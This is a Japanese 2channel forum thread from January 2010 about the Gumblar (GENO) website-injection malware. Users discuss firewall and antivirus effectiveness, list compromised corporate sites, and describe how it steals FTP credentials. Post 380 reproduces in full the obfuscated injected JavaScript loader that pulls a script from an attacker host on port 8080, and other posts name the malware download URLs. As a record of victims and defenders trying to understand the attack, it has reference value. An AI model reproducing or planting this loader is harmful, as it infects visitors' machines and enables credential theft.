プログラムを実行できてしまうのでどんな攻撃も可能だから注意

229:名無しさん@お腹いっぱい。
10/01/03 21:19:51
個人用のセキュリティソフトはほとんど役に立たないで・・・FA


230:名無しさん@お腹いっぱい。
10/01/03 21:24:20
そんなことはない

231:名無しさん@お腹いっぱい。
10/01/03 21:47:44
んだんだ
脆弱性突かれているのを防ぎきれるもんではないわな
FWもやられてしまうと考えるのが普通

232:名無しさん@お腹いっぱい。
10/01/03 22:04:45
あほ

233:名無しさん@お腹いっぱい。
10/01/03 22:06:22
むしろ無知な人以外にはかなり防御しやすい攻撃

234:名無しさん@お腹いっぱい。
10/01/03 22:21:11
大騒ぎになるマルウェアって単純なやつも多いよな
P2Pで流行った情報流出みたいにファイアウォールだけで防げるのも多い
ファイルを実行しちゃう時点で駄目だけど

235:名無しさん@お腹いっぱい。
10/01/03 22:22:12
FTPアカウントを攻撃者に送る通信って、何番のポートで行われる?
これが80番や443番とかじゃなければ、アウトバウンド通信の制御をしてれば
ある程度防げそう。

236:名無しさん@お腹いっぱい。
10/01/03 22:23:50
だから制御なんて考えなくてもポップアップされるって
あくまでも今のところな

237:名無しさん@お腹いっぱい。
10/01/03 22:25:36
防げれない。


238:名無しさん@お腹いっぱい。
10/01/03 22:28:25
>>234
単純だからアンチウイルスも検出しにくいって言うのもあるね

239:名無しさん@お腹いっぱい。
10/01/03 22:39:11
脆弱性を突かれしまったらアンチウイルスもFWも全くの無力
ここの連中どんだけ呑気なんだよwww

240:名無しさん@お腹いっぱい。
10/01/03 22:49:15
しつけえな

241:名無しさん@お腹いっぱい。
10/01/03 22:51:50
悔しいから嘘まき散らしてるんだろ
べつに争ってるわけじぇねえんだからやめろよ

242:名無しさん@お腹いっぱい。
10/01/03 22:59:31
脆弱性突かれてもFW入れていれば情報は漏れない・・・ぷぷぷ
嘘の情報流すのはよせよ

243:名無しさん@お腹いっぱい。
10/01/03 23:00:19
FW云々は
事前に感染を防げるかと
感染後の被害を防げるかで
話が噛み合ってない気がする

244:名無しさん@お腹いっぱい。
10/01/03 23:08:15
要は0-dayをどうやって防ぐかってことだろ
Adobe Reader使わなきゃいいんじゃね

245:名無しさん@お腹いっぱい。
10/01/03 23:09:08
>>243
話はかみ合ってないが
漏れてないと思うね

246:名無しさん@お腹いっぱい。
10/01/03 23:11:26
>>244
もちろん脆弱性をふさぐのは基本だけどね

たとえ脆弱性残したままだったとしても
FWがあればこの攻撃に気づくってだけの話

247:名無しさん@お腹いっぱい。
10/01/03 23:16:01
誰もFWで感染が防げるとか言ってない
一人勘違いしてるみたいだが
同じような人がいるかも知れないから勘違いしないようにね


248:名無しさん@お腹いっぱい。
10/01/03 23:21:38
実際は性能の良いHIPSがあるFWなら防げるけどね

249:名無しさん@お腹いっぱい。
10/01/03 23:25:32
>>242
こいつはなんにも分かってない
脆弱性も分かってない

250:名無しさん@お腹いっぱい。
10/01/03 23:32:21
snortとかに検知ルールがりがり書けばええねん

251:名無しさん@お腹いっぱい。
10/01/03 23:34:10
adobeなんで0DAY長期間放置してるんだ?

252:名無しさん@お腹いっぱい。
10/01/03 23:38:11
adobeに関してははっきりと告知すべきだよな
ほとんどの人は知らないんじゃないか

253:名無しさん@お腹いっぱい。
10/01/03 23:39:39
データ抜いて外部に流すタイプならいいけど
システムやファイル破壊するタイプとか出たら
FWじゃどうしようも無いからなぁ

254:名無しさん@お腹いっぱい。
10/01/03 23:39:48
少なくともカスペは駄目だった
URLリンク(oshiete1.goo.ne.jp)

255:名無しさん@お腹いっぱい。
10/01/03 23:42:36
>>252
お前だけだそんなこと思ってるやつ
自分で情強とか思ってるだろ

256:名無しさん@お腹いっぱい。
10/01/03 23:43:07
>>252
FlashPlayer更新してない人も世間的に結構居るんでね?
どこそこの動画サイトで不具合出るから古いのに戻したとかも居そう

257:名無しさん@お腹いっぱい。
10/01/03 23:45:11
>>256
お前だけだそんなこと思ってるやつ
自分で情強とか思ってるだろ

258:名無しさん@お腹いっぱい。
10/01/03 23:45:23
>>255
そんなこと思うわけねえだろ
頭大丈夫かよ
情報が行き届いてないから感染するんだろ
馬鹿め

259:名無しさん@お腹いっぱい。
10/01/03 23:46:12
>>255
おまえそんなに悔しいのかよ

260:名無しさん@お腹いっぱい。
10/01/03 23:46:40
>>258
自分で情強とか思ってるだろ

261:名無しさん@お腹いっぱい。
10/01/03 23:47:34
>>259
おまえそんなに悔しいのかよ

262:名無しさん@お腹いっぱい。
10/01/03 23:47:37
>>260
なんだよ情強って?
日本語で書いてくれよ

263:名無しさん@お腹いっぱい。
10/01/03 23:48:24
>>262
おまえそんなに悔しいのかよ


264:名無しさん@お腹いっぱい。
10/01/03 23:48:52
悔しくても荒らすなよ
だいたいなんでそんなに悔しいがるんだよ
勘違いしてるんじゃないか

265:名無しさん@お腹いっぱい。
10/01/03 23:51:57
>>254
かわいそうに悔しくても荒らすなよ
だいたいなんでそんなに悔しいがるんだよ www

266:名無しさん@お腹いっぱい。
10/01/03 23:53:15
ファイアウォールやアンチウイルスの設定書き換えちゃったりは無いの?

267:名無しさん@お腹いっぱい。
10/01/03 23:56:39
>>266
今のところ無許可で書き換えはないと思う
最近のは保護機能があるのも多いしね

268:名無しさん@お腹いっぱい。
10/01/04 00:10:49
URLリンク(oshiete1.goo.ne.jp)
自分も初期のGENOウイルスでカスペルスキーで感染しました。
良くHIPSやプロアクティブの事を言われる方を見受けますが実際は
GENOウイルスには全く役に立ちませんでした、

そのGENOで4月末から5月初旬まで非常に困った経験者です。
初期のものはカスペルスキーでも反応はするのですが阻止できませんでした。
前バージョンの7.0をWin2000で使っていましたが、アドビリーダーの5と9を
両方混在させていたのが失敗でした。

IE6、ファイヤーフォックス3でのグーグルツールバーに細工をしてしまい、
何を検索しても、海外の謎の黒バックに青文字のサイトが表示されてしまいました。
次に出たバージョンでは、なにを検索しても404Not Foundと表示されて、
(404にも色々なバージョンがありました。)実は表示自体がウソで他のサイトに
さらにアクセスさせようとしていました。何かの送信が止まらない、ネットワークの
切断出来ない。IPアドレスの解放と再収得が出来ない。なんだこれは。といった
状態で、ブチ。とLANケーブルを引っこ抜きました。


269:名無しさん@お腹いっぱい。
10/01/04 00:16:51
>>267
どうもです
取り敢えず安心できそう

270:名無しさん@お腹いっぱい。
10/01/04 00:25:11
ていうかこれもうGENOと呼ぶには違うんじゃね
JREって呼ぼうぜw

271:名無しさん@お腹いっぱい。
10/01/04 00:42:25
>>243
実際>>159で試したところ
FWで最初に確認できるアクセス以前での情報流出は確認できない
あくまでもそのサイトでってことだけどね

272:名無しさん@お腹いっぱい。
10/01/04 03:19:13
URLリンク(imepita.jp)

私のPCが起動するとこんな風になるようになったんですが、
これはこのスレのウイルスに該当しているんですかね?

ちなみにOSはvistaで、
この画像の状態は起動して、
ロゴマークがでて、ユーザーログインしてからの状態です。

273:名無しさん@お腹いっぱい。
10/01/04 03:21:56
矢印のアイコン出て固まる感じ?なら、そうだよ。

274:名無しさん@お腹いっぱい。
10/01/04 03:31:31
カーソルは動くんです
でも背景が真っ暗で、下のスタートのバー?所が真っ白になってます。
真っ白な所に合わせると、矢印から砂時計になります。
この画面から何も操作できないです。

どうすれば復旧できますか?
甘えかも知れませんが、教えていただけるとありがたいです。

275:名無しさん@お腹いっぱい。
10/01/04 06:20:38
>>268
>自分も初期のGENOウイルスでカスペルスキーで感染しました。
>良くHIPSやプロアクティブの事を言われる方を見受けますが
>実際はGENOウイルスには全く役に立ちませんでした、

カスペルスキーの無力ぶりにワロタwww


276:名無しさん@お腹いっぱい。
10/01/04 07:43:59
たかが個人向けの有料あるいは乞食版FWのログを見て無理やり
安心しようとしているところが笑えるスレですね

回避されてるんじゃぁあって思わないのかね
でなきゃこんだけ広がるのはおかしいでしょ

277:名無しさん@お腹いっぱい。
10/01/04 08:10:45
>>276
こういうスレ見てる奴はまあいいんだよ

問題なのはPCに使われてる(笑)一般人
GumblarとかGENOとか知ってる?て聞いても「なにそれ」で終わる
もちろんセキュリティソフトなんて入れてないし、入れようともしない
家電感覚でPC買ってる奴はこんなんばっかりだな

278:名無しさん@お腹いっぱい。
10/01/04 08:13:43
>>276
ほんとしつこいね
その程度の人はお前だけだよ

279:名無しさん@お腹いっぱい。
10/01/04 08:27:36
>>278
ほんとしつこいね
その程度の人はお前だけだよ


280:名無しさん@お腹いっぱい。
10/01/04 08:29:20
たしかに>>278が一番バカっぽいwww

281:名無しさん@お腹いっぱい。
10/01/04 08:30:29
しつこい阿呆のために説明すると
脆弱性を利用してpdfupd.exeがダウンロードされ実行される
トロイ本体が解凍され実行される
ここで通信が行われるからすぐ分かるって話なんだよ
異変に気づけば何らかの対処ができるだろうってこと

282:名無しさん@お腹いっぱい。
10/01/04 08:30:43
一番バカっぽいのは>>278で決まりですね!!!

283:名無しさん@お腹いっぱい。
10/01/04 08:32:02
それでも分からないなら自分で試せ
これでおしまいにしてくれよ

284:名無しさん@お腹いっぱい。
10/01/04 08:33:08
よほど悔しかったみたいだなw

285:名無しさん@お腹いっぱい。
10/01/04 08:35:16
>>281
で、どこのFWなら分かって、どこのFWなら分からないの?


286:名無しさん@お腹いっぱい。
10/01/04 08:44:35
外向きの通信が発生したとき分かるようなソフトならどれでも良いだろ
分からないFWは外向き通信を監視しないやつやそう設定してる場合

具体的にと言うなら俺はOutpostを使ってる
もちろんその他のソフトでも問題ない

287:名無しさん@お腹いっぱい。
10/01/04 08:59:26
アウポなら大丈夫かもしれんけど、そんなもん普通使ってないから


288:名無しさん@お腹いっぱい。
10/01/04 11:30:31
海外からのFTP接続を拒否れば書き変えは不可能ってことでOK?

289:名無しさん@お腹いっぱい。
10/01/04 11:37:57
そんな設定レン鯖で出来るんか?

290:名無しさん@お腹いっぱい。
10/01/04 12:00:36
普通のレン鯖じゃ無理だろうね

291:名無しさん@お腹いっぱい。
10/01/04 12:05:59
>>274
>>4
テンプレ見てないんじゃ甘えだろ
感染前のレジストリに戻せば直るかもな

292:名無しさん@お腹いっぱい。
10/01/04 17:08:49
年末に感染サイト踏んで、今日までPCオフで様子見。ようやくFTP起動させてサイトのデータDL
数分待って自サイトソース確認するも改ざん現れず

何故生き残ったのか、自分でも分からん
XP(昨年11月以降未うp立て)、IE6(ジャバスクオン)
adobeリーダーのジャバスクは切ってあったが、これが命綱だったのか?

293:名無しさん@お腹いっぱい。
10/01/04 18:23:09
年末にadobeらしきアップデートが出てきてPCがクラッシュしたとか言い出したのが社内にいて
そいつに教えておいたFTPアカウント全部書きかえられてたわ

294:名無しさん@お腹いっぱい。
10/01/04 18:25:36
陥落サイトを掘ってみた。
URLリンク(kyu-ta)<)●sakura●ne●jp/nekkei080401●mht
URLリンク(blog)<)●blog3●fc2●com/
URLリンク(blog3)<)●s10●xrea●com/
※~~xrea.comは全滅っぽい気がする

tp//lists●sourceforge●jp/mailman/archives/slashdotjp-dev/
URLリンク(www)●aoki●ecei●tohoku●ac●jp/topic/RSNA_press_release/HealthImaging_com●mht
妙なとこだけ改竄されてるし

295:名無しさん@お腹いっぱい。
10/01/04 18:34:34
gumblar.cn/が復活してるね

URLリンク(www.google.com)
Google が最後にこのサイトを巡回したのは2010-01-03で、
このサイトで不審なコンテンツが最後に検出されたのは2010-01-03です。


296:名無しさん@お腹いっぱい。
10/01/04 19:16:37
>>294
教えてやれよ

297:名無しさん@お腹いっぱい。
10/01/04 20:54:55
>>296
294じゃないけど、fc2の方にメールを送ろうと思ったら
IDを持っていないとそもそも相手にしてくれないようなので
メールすら送れない・送り先が分からない。

こういうので個人あてにメールを送っても返信が来た試しがない。

298:名無しさん@お腹いっぱい。
10/01/04 20:55:09
>>294
どこもやられてないじゃん。
お前さんのキャッシュに妙な物が追記されるなら、お前さんが感染してるんじゃね。

299:名無しさん@お腹いっぱい。
10/01/04 21:05:16
>>298
確かに仮想機(うぃんXP2)で踏んでみても何も起こらない・・・

300:名無しさん@お腹いっぱい。
10/01/04 21:24:38
>>294
新手の宣伝か?(笑)

301:名無しさん@お腹いっぱい。
10/01/04 22:11:49
Trojan.Injectに感染した >>294 が居ると聞いて

302:名無しさん@お腹いっぱい。
10/01/04 22:53:39
モロゾフの公式サイトでトロイ配布中
スレリンク(news板)

303:名無しさん@お腹いっぱい。
10/01/04 23:03:25
GNU GPLの8080ですな。

304:名無しさん@お腹いっぱい。
10/01/04 23:08:20
PDigiiEPG.exeだと!?

305:294
10/01/04 23:22:08
>>298-299
釣ってすまなかったが、
感染してないという検証ありがとう。

【8080チェッカー】
URLリンク(www12.atpages.jp)
↑↑↑
ザル&誤検出過多という事が証明されたよw


306:名無しさん@お腹いっぱい。
10/01/04 23:38:33
ザルは仕方ないとしても、語検出もするのかよw

307:名無しさん@お腹いっぱい。
10/01/05 00:31:40
>>292
数分じゃわからんよ

308:名無しさん@お腹いっぱい。
10/01/05 00:32:45
どうやらこのスレは釣り堀化してるな(笑)

309:名無しさん@お腹いっぱい。
10/01/05 00:33:50
アホが釣れた

310:名無しさん@お腹いっぱい。
10/01/05 00:34:58
>>1-999
本スレはこっちですよ。

GENOウイルススレ ★23
スレリンク(sec板)

311:名無しさん@お腹いっぱい。
10/01/05 00:38:46
>>302
に飛んだらNODが反応したんだけど大丈夫かよ

312:名無しさん@お腹いっぱい。
10/01/05 00:39:48
反応したんだから大丈夫だろ
モロゾフで急に騒がしくなったな

313:名無しさん@お腹いっぱい。
10/01/05 00:40:08
コードそのまま貼った奴がいるからな

314:名無しさん@お腹いっぱい。
10/01/05 00:40:09
何故毎度毎度ソースの見方も知らないくせに、あほなチェッカーを信用して
騒ぎ立てるバカが発生するのか
しかもわざわざセキュ板覗いてる程なのに

315:名無しさん@お腹いっぱい。
10/01/05 00:42:32
>>314
色んなやつがいるから仕方ない

316:名無しさん@お腹いっぱい。
10/01/05 00:58:25
モロゾフ
URLリンク(www.virustotal.com)

317:名無しさん@お腹いっぱい。
10/01/05 00:59:35
今更もう良いよ
ずっとその話してるのに

318:名無しさん@お腹いっぱい。
10/01/05 01:17:10
モロゾフ、アウト~

319:名無しさん@お腹いっぱい。
10/01/05 01:21:44
こんどはモロゾフか
いちおう、MicrosoftのSmartScreenと、ゴーグルのセーフブラウジングとやらに
モロゾフ報告したけど、いまだに変化なし

320:名無しさん@お腹いっぱい。
10/01/05 02:29:25
>>314
チェッカーの性能がわかったじゃないかw

321:名無しさん@お腹いっぱい。
10/01/05 03:13:55
URLリンク(127.0.0.1)にアクセスで感染確認ってできる?

322:名無しさん@お腹いっぱい。
10/01/05 03:23:06
無理

323:名無しさん@お腹いっぱい。
10/01/05 09:54:58
>>307
一晩たったが大丈夫そうだ
やっぱReaderのジャバスク切ってたのが効いたらしい。今では大抵のベンダーが検出できるっぽいし、漸く一安心だ

324:sage ◆sage/xLnlI
10/01/05 15:16:29
>>76
踏んじゃった
でもnorton先生が止めてくれた

325:名無しさん@お腹いっぱい。
10/01/05 16:26:02
何かうちのport2049から某RSSサーバにやたらリクエストが送られてるんだが、このウィルス?

326:名無しさん@お腹いっぱい。
10/01/05 17:04:33
ブラウザのRSS機能なんじゃね?

327:名無しさん@お腹いっぱい。
10/01/05 17:17:53
そこまでわかっててGeno疑うってどういう知識の偏り方なのか疑問だ

328:名無しさん@お腹いっぱい。
10/01/05 17:34:35
ヤフートップキタ━━(゚∀゚)━━!!!!

329:名無しさん@お腹いっぱい。
10/01/05 19:19:24
今日の夕刊読売新聞ガンブラー記事一面
ホンダもやられてたのね

330:名無しさん@お腹いっぱい。
10/01/05 19:43:16
>ホンダもやられてたのね
何をいまさら…。

JR東日本 URLリンク(www.jreast.co.jp)
本田技研 URLリンク(www.honda.co.jp)
モロゾフ URLリンク(www.morozoff.co.jp)
信越放送 URLリンク(www.sbc21.co.jp)
デジタルマガジン URLリンク(digimaga.net)
アニたまどっとコム(ラジオ関西) 告知消失

331:名無しさん@お腹いっぱい。
10/01/05 23:02:13
エロサイト徘徊している俺は確実にアウトなんだろうな・・・・・・
AVGフリー、Ad-Aware、spybotしか使っていない俺はどうしたらいいのでしょうか?

332:名無しさん@お腹いっぱい。
10/01/05 23:24:03
AVGフリーでも反応するぞ

333:名無しさん@お腹いっぱい。
10/01/05 23:35:19
精度は決して高くはないがフリーならまだavastの方がいいぞ

334:名無しさん@お腹いっぱい。
10/01/05 23:46:07
蔓延具合やばいな
次は辻ブログか
どこまで感染が広まるやら

335:名無しさん@お腹いっぱい。
10/01/05 23:58:58
win.jpgって63バイトなんだけど、
これで感染させることができるの?


336:名無しさん@お腹いっぱい。
10/01/06 00:28:27
エスパーさんは先程お眠りになられました

337:名無しさん@お腹いっぱい。
10/01/06 02:21:35
>>335
無理。つかwin.jpgは関係ない。

338:名無しさん@お腹いっぱい。
10/01/06 02:47:02
嘘言うなよ
分からないなら黙ってろ

339:名無しさん@お腹いっぱい。
10/01/06 03:15:52
/*GNU GPL*/のスクリプト解読してみたけどさ
解読して出てきたURL先のものをjavascriptだぞと
というのは記述してるわけ

で今のウィルスってjavascriptで読み込ませたとしても
悪さするプログラムって実行できるわけ?
そもそも勝手なプログラムの実行はvistaだと防げるわけだし

やっぱりアドビの0-dayでアップデートに紛れ込んで
FTPを盗むプログラムを実行したと思われる
だから今のところ/*GNU GPL*/のスクリプト読んでも無害なんじゃね

詳しい人どう思う?







340:名無しさん@お腹いっぱい。
10/01/06 03:18:45
>>334
頭のjsがやられてるからハロプロ全体のような希ガス
URLリンク(knnn4321)●chips●jp/js/prototype●js

/*GNU GPL*/ try{window.onload


341:名無しさん@お腹いっぱい。
10/01/06 03:22:02
>悪さするプログラムって実行できるわけ?
それが出来ちゃう脆弱性を利用してるわけ
vistaでも実行は可能だがUACオンだとスタートアップに登録可能かどうかは知らない

342:名無しさん@お腹いっぱい。
10/01/06 03:24:46
それに例えスタートアップに登録できなくても
実行できちゃえば
再起動までは攻撃は有効だと思う

343:名無しさん@お腹いっぱい。
10/01/06 03:26:03
>>339
というか基本的なことを分かってない
このスレ読んだだけでももう少し分かるだろ

344:名無しさん@お腹いっぱい。
10/01/06 03:35:39
>>339
何度も言われていると思うが
モロゾフのやつは
Microsoft Video ActiveX コントロールの脆弱性
Adobe Reader/Acrobatの脆弱性
Sun Javaの脆弱性
の三つの脆弱性のどれかが使われる

345:名無しさん@お腹いっぱい。
10/01/06 03:46:29
つまり/*GNU GPL*/を読み込むと
Microsoft Video ActiveX コントロールの脆弱性
Adobe Reader/Acrobatの脆弱性
Sun Javaの脆弱性
このどれかをついてプログラムが実行されちゃうってこと?

346:名無しさん@お腹いっぱい。
10/01/06 03:48:34
そういうこと

347:名無しさん@お腹いっぱい。
10/01/06 05:27:59
>>335,337
win.jpgは脆弱性を突いてクラッシュさせるのが役目で、そいつだけじゃ感染しない。
そいつを読み込ませるJavaScript側でshellコードを生成し、メモリー内にまき散らしておいて
クラッシュ -> shellコード実行 -> ウイルス本体召喚 -> ざまあ!


348:名無しさん@お腹いっぱい。
10/01/06 09:31:04
ってかさ、AVG、Avast、MSEssentialsって入れると互いに競合しないの?
一時のAd-AwareとSpyBotみたいに
ウイルスソフトって入れまくってもいいの?


349:名無しさん@お腹いっぱい。
10/01/06 09:37:53
Avast+MSEは競合しないよ
スレリンク(sec板:357-375番)

350:名無しさん@お腹いっぱい。
10/01/06 10:09:14
俺AVGツールバーってのインストールしてるんだけど、これの安全性:完全ってサイト使ってれば大丈夫なんだろうか?
今回のGumblarってXXSだろうけど、となるとツールバーに危険と表示される間もなくホンダなどのサイトでは安全性:完全ってなるんだろうか?
ホンダとか感染したサイト行く勇気は無いんですが、このツールバーでGumblarを予防できるものなんでしょうか?
もし出来なきゃこのツールバーなんの意味があるのかなと思ったりもしますが・・・

351:名無しさん@お腹いっぱい。
10/01/06 10:39:55
Java Runtime Environmentて別に使わなかったらアンインストールしたほうほうが無難?

352:名無しさん@お腹いっぱい。
10/01/06 11:44:08
昨日深夜に
adsrevenue-net.king.com.newgrounds-com.themobilewindow●ru:8080/pics/win.jpg
からの侵入をノートンが遮断したログが残ってるんですけどこれってなに?
2chを閲覧してたら誘導されたってことかな?

353:名無しさん@お腹いっぱい。
10/01/06 11:48:11
今のところ個人のサイトやブログでは見つかってないんだね。
自分のブログも一応、確認しよう・・・

354:名無しさん@お腹いっぱい。
10/01/06 11:49:57
>>352

>>1よめ

355:名無しさん@お腹いっぱい。
10/01/06 11:59:40
>354
twintailが
HTTP MS MPEG2TuneRequestControl ActiveX BO 2 をと書いてあったので
2chの閲覧が原因かと思ったのですがね。

356:名無しさん@お腹いっぱい。
10/01/06 12:03:00
2日前に踏んだのを、TELNETで入って解析してみたら

sciencedirect-com.lequipe.fr.gamestop-com.superore●ru:8080/verycd.com/verycd.com/google.com/zaobao.com/rakuten.co.jp/

を経由して

ks369871●kimsufi●com:8080

から.jsファイルをダウンロードしようとしていた。だた、このファイルがダウンロードできなかったので助かったようだ。

357:名無しさん@お腹いっぱい。
10/01/06 12:09:43
pdfはレポートとかで使うからなー消したいのに消せないもどかしさ

358:名無しさん@お腹いっぱい。
10/01/06 12:16:57
>>352
そのURLはこのスレの76で直リンされてて
俺の場合、専ブラで画像を自動サムネイルするようにしてるので
専ブラがアクセスしたらAvastのネットワークシールドが遮断した

359:名無しさん@お腹いっぱい。
10/01/06 12:21:16
>>358
76を見ただけでノートンが遮断しました。
原因が解ってほっとしました。 有り難うございます。

360:名無しさん@お腹いっぱい。
10/01/06 12:24:38
>>356
507 名前:名無しさん@お腹いっぱい。 投稿日:2010/01/05(火) 00:45:49 ID:zAbuPfRw0
砂箱に入れたFirefoxからFirebugで色々見てみたけど
呼び出される本体のjsファイルがNot foundで発火しないね

508 名前:名無しさん@お腹いっぱい。 投稿日:2010/01/05(火) 00:55:20 ID:qZhWCv8d0
アクセス制御で2回目以降は404を装う。

509 名前:名無しさん@お腹いっぱい。 投稿日:2010/01/05(火) 01:13:20 ID:zAbuPfRw0
串さしてやったら死んだわ・・・
やばいな

361:名無しさん@お腹いっぱい。
10/01/06 12:30:38
>>360
まじかー!

362:名無しさん@お腹いっぱい。
10/01/06 12:55:38
76の攻撃側のアドレスって侵入を試みる度に変わるねえ。

363:名無しさん@お腹いっぱい。
10/01/06 13:09:00
>>361
gumblarの頃からそういうアクセス制御は入ってるよ。
gumblar.xでは2段構成のうちリダイレクト先(ウイルスばら撒き側)は
陥落サイト群の中からPHPが動作しているサイトが選別されていた。

364:名無しさん@お腹いっぱい。
10/01/06 13:47:15
win.jpg
URLリンク(www.virustotal.com)
対応済み:Avira・Kaspersky・McAfee・NOD32・Panda・Symantec etc

JavaGame.jar
URLリンク(www.virustotal.com)
対応済み:Avira・MSE・Symantec・TrendMicro etc

365:名無しさん@お腹いっぱい。
10/01/06 14:27:45
gumblarに犯されている情報の、最新のサイト名(リンクは要らないです)誰か教えてくれませんか?


366:名無しさん@お腹いっぱい。
10/01/06 14:31:16
対策ソフトを集めてマルウェアの性能テストをしている者です。
PC雑誌の熟読には自信があります。

>通称GENOウイルスに強いかどうか、

ええ、強い方ですけど。

基本的にGENOだろうと何だろうと今はもう何らかの悪意を持つプログラムや
スクリプトを総称してマルウェアと呼んでいます。昔からの名残で説明の便宜上
使うとかその程度の意味しかないです。

私のこれまでの経験から言うとすれば、Kaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。

367:名無しさん@お腹いっぱい。
10/01/06 14:43:37
釣り針でかすぎるぞw

368:名無しさん@お腹いっぱい。
10/01/06 14:48:07
Heur.Win32.Generic.v
て言うウイルスが2回も・・・・

369:名無しさん@お腹いっぱい。
10/01/06 15:17:31
大規模流行は大手どこならどこも対応するからどれでも一緒だよ。

370:名無しさん@お腹いっぱい。
10/01/06 16:34:22
>>364
対応早くなったかな?

371:名無しさん@お腹いっぱい。
10/01/06 16:47:36
「拡張子ではなく、内容によってファイルを開く」という設定がIEでは標準有効だからなぁ・・・

372:名無しさん@お腹いっぱい。
10/01/06 16:50:25
変えればいいだけ

373:名無しさん@お腹いっぱい。
10/01/06 16:52:12
なにまた火狐野郎がなんかいっちゃてんのか

374:名無しさん@お腹いっぱい。
10/01/06 16:57:39
あたいはopera使いちゃん!

375:名無しさん@お腹いっぱい。
10/01/06 18:17:46
スレリンク(news板)

376:名無しさん@お腹いっぱい。
10/01/06 18:41:26
VirtuaBoxにインストールしたWindows XP SP3でwin.jpgを踏んだら
いつの間にか悪名高いSecurity Toolがインストールされてたw
もう少し遊んでみよう

377:名無しさん@お腹いっぱい。
10/01/06 18:55:34
>>364
avast!はコード自体をwebシールドで弾くから無問題。


378:名無しさん@お腹いっぱい。
10/01/06 19:36:16
Firefox更新きたな

379:名無しさん@お腹いっぱい。
10/01/06 19:39:00
しらん

380:名無しさん@お腹いっぱい。
10/01/06 19:54:30
<script>
/*GNU GPL*/
try{window.onload = function(){var U26gcel3nnek = document.createElement('s@$$&c)$&r$i#(p#$!t!!('.replace(/@|\)|\!|\(|\^|\$|&|#/ig, ''));
var Zavq7z4z78k = 'Imrp1rhevfo';
U26gcel3nnek.setAttribute('type', 't(^$e&@&x!!$t!@&/)j((a)v&&a@(^s(!c((r!i$!p!$t!(#'.replace(/\^|#|&|\!|\(|\$|\)|@/ig, ''));
U26gcel3nnek.setAttribute('src', 'h())&t)t$$p@#:)^$)/((^/!$#g!o(&&u^^^g!$o?u!-$&c!)!o)^$$m)@!^.$(#n&)$i
#(n^#^g@.&@c&$#o@m(.)a###!c#(e!$$(r$$-^#c!@o)@!$m@.$^s)(u!@p$$e@r@(a(g(@^u)$&)!i#d!e&!!#.!@^r(^u^:)
#8&^#&0#(8)^0^/!!#i@$)#n^$@$.&!)!c&!(o((!m$&&/$i#!$n#!).)$@c#(^o@!$&m(@/@$g@o))o^&g@&l!#e!.^)c))o@
m#&@/$^#v#)i!)#d!^@e&)$)o@)!@@s#z$(.?^c@!$o!m(^^/@b^(&e#!@&s@((t)#$@#t&^)^u&b!(e^)c$^#l!@)i$)&!$p)
@s!$^$(.&$c@&)@o)!$m(^#&/('.replace(/\!|@|#|\$|\(|&|\^|\)/ig, ''));
U26gcel3nnek.setAttribute('defer', 'd!$@$e@f!!(&(e^r@)'.replace(/@|\(|\$|#|\!|\)|\^|&/ig, ''));
U26gcel3nnek.setAttribute('id', 'M$e!$7#!)r#!$l?@^9()!(#t$!^9&q#)@$$b&&^!3&@)'.replace(/\^|\)|@|&|\$|\!|\(|#/ig, ''));
document.body.appendChild(U26gcel3nnek);}}
catch(Lpmpa57y1j) {}
</script>
<!--86fa61201e3ca3a075145a1d33d3c209-->

381:sage ◆sage/xLnlI
10/01/06 19:59:26
思いっきり踏みました

382:sage ◆sage/xLnlI
10/01/06 20:05:47
URLリンク(up3.viploader.net)
ソース


どちらさまかWindows7の感染確認方法を教えていただける方はいらっしゃいませんでしょうか

383:名無しさん@お腹いっぱい。
10/01/06 20:06:30
MSに電話白や

384:名無しさん@お腹いっぱい。
10/01/06 20:07:49
>>360
これって、もしかして同じLANから見たら、一人目しか感染しないってことか?

385:名無しさん@お腹いっぱい。
10/01/06 20:18:27
GENOウイルス感染 ローソン
スレリンク(news板)l50


386:名無しさん@お腹いっぱい。
10/01/06 21:22:22
>>382
んなもんないからとっととOSいれなおせ

387:sage ◆sage/xLnlI
10/01/06 21:24:34
>>386
えっ

いまノートン先生が0v3exclv.exeを削除してくれました

388:名無しさん@お腹いっぱい。
10/01/06 21:26:09
やっぱりUACはスルーするのか

389:名無しさん@お腹いっぱい。
10/01/06 21:44:36
>>387
それだけかどうかわからないよ

390:名無しさん@お腹いっぱい。
10/01/06 22:40:20
京王電鉄HPも改ざん被害 ウイルス「ガンブラー」
スレリンク(news板)

391:名無しさん@お腹いっぱい。
10/01/06 22:52:56
>>387
firefoxにはnoscript入れてなかったの?
それとも入れた結果がこれだyoってこと?

392:名無しさん@お腹いっぱい。
10/01/06 23:19:00
UACスルーってマジかよ、何のための暗転だよ

393:名無しさん@お腹いっぱい。
10/01/06 23:19:53
スレリンク(pc板)

394:名無しさん@お腹いっぱい。
10/01/06 23:23:15
海外ではあんま騒いでないよな
なんだこの差は

395:名無しさん@お腹いっぱい。
10/01/06 23:31:25
>>394
"セキュリティツール"の画面が出てくるって騒ぎになっていると聞いたような。
具体的な場所は分からないけど。

396:名無しさん@お腹いっぱい。
10/01/06 23:40:22
これ、もしかして制限ユーザだと全く感染しない?

397:名無しさん@お腹いっぱい。
10/01/07 00:26:16
>>395
Security Toolな。
これも改ざんされたサイトを閲覧して、脆弱性を利用して感染するらしい

398:名無しさん@お腹いっぱい。
10/01/07 00:37:14
サイト www.spacecraft.co.jp/home.html の調査結果
検出されたウイルス(ワーム、スパイウエア)
Trojan-Downloader.JS.Agent.ewh



399:名無しさん@お腹いっぱい。
10/01/07 00:44:56
>>398
そのウィルスはつい最近まで、GDATAの誤検出だとずっと思ってた。

400:名無しさん@お腹いっぱい。
10/01/07 00:46:38
↓↓↓
URLリンク(www)●global2j-education●com/contact
↑↑↑

httpsが、、、

401:名無しさん@お腹いっぱい。
10/01/07 00:49:02
世界中のHTMLのソースコードを検索できたら回避できるのにね
グーグル辺りがやってくれないかな・・・・

402:名無しさん@お腹いっぱい。
10/01/07 00:49:40
FTPがやられるんだからhttpsとか関係ないよ


403:名無しさん@お腹いっぱい。
10/01/07 00:56:28
32 名前: すり鉢(アラバマ州) 投稿日: 2010/01/07(木) 00:45:39.79 ID:RXPRsCkB
p://www●spacecraft●co●jp/home●html
スペースクラフトグループ
神田うの、黒谷友香、栗山千明、岩田さゆり、青山倫子、宇浦冴香、等が所属。

ガンブラーキタ━(゚∀゚)━!!

404:名無しさん@お腹いっぱい。
10/01/07 01:21:53
